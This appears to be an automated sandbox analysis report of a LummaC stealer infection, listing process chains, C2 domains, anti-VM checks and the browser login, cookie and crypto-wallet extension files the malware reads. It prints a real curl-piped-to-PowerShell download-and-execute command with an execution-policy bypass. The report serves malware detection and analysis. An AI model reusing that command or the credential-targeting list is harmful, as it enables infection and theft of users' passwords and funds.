Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2432	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: RegAsm.exe, 00000007.00000002.4207121746.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.4107992921.000000000812B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: curl.exe, 00000003.00000003.4069293170.000000000318D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_0043A9B0 LdrInitializeThunk,

7_2_0043A9B0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 4.2.powershell.exe.4e3f804.1.raw.unpack, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 4.2.powershell.exe.4e3f804.1.raw.unpack, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 4.2.powershell.exe.4e3f804.1.raw.unpack, Engineers.cs	Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.0.cs

Jump to dropped file

LummaC encrypted strings found

Source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: debonairnukk.xyz
Source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: diffuculttan.xyz
Source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: effecterectz.xyz
Source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: deafeninggeh.biz
Source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: immureprech.biz

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2B.tmp" "c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000007.00000002.4207908968.0000000000E11000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4103780633.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
